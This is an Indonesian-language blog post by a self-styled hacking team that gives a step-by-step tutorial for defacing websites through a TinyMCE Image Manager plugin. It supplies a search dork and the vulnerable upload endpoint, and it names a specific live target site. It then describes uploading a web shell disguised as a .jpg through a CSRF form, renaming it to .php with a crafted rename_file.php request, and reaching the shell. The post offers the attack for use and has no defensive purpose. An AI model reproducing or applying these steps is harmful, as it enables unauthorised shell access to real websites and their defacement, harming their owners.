Deface POC TinyMCE
Rabu, 17 Juni 2020
Deface Poc TinyMCE
Ok kali ini gw akan kasih materi deface Poc TinyMCE Plugins Image Manager
caranya cukup mudah, , siapkan dulu shell yang ber extensi .jpg
Bahan bahan :
caranya cukup mudah, , siapkan dulu shell yang ber extensi .jpg
Bahan bahan :
CSRF
DORK : inurl:/tinymce/plugins/image/
DORK : inurl:/tinymce/plugins/image/
Exploit : /tinymce/plugins/image/upload.php
Live Target : https://www.madisonts.com/js/tinymce/plugins/image/upload.php
LANGKAH 1 :
Kalian dorking dulu tekan atau gak pake live target diatas
LANGKAH 2 :
Kalian masukan xploitnya , kalau tampilannya seperti dibawah bisa juga blank itu berarti vuln
LANGKAH 3 :
Kalian Salin Link nya lalu ke CSRF ONLINE
Upload extensi shell .jpg , inget jangan langsung upload ext .php
LANGKAH 4 :
lalu upload shell ext jpg nya, kalau sukses muncul seperti Dibawah
LANGKAH 5 :
Nah kalau muncul sepeti ini salin tulisan FILE-20180702-0754DCWUCH8NHQFC.jpg nah yang kaya gitu
Lalu kita disini mengubah shell jpg kita menjadi php, gimana caranya? Cek bawah njeng
http://site.com/[path]/tinymce/plugins/image/rename_file.php?current_name=NAMA-FILE-SHELL-YANG-BERHASIL-DI-UPLOAD.jpg&new_name=namashellbaru.php
LANGKAH 6 :
Kalau berhasil dia akan memuncul kan tulisan banyak seperti dibawah
Akses Shell?
site.com/[path]/tinymce/plugins/image/uploads/namashellyangbaru.php
Sekian aja materi dari gw :)
Contact US :
WhatsApp : 081377804838
Gmail : mynamehjk12@gmail.com
[$] FORCE CYBER TEAM [$]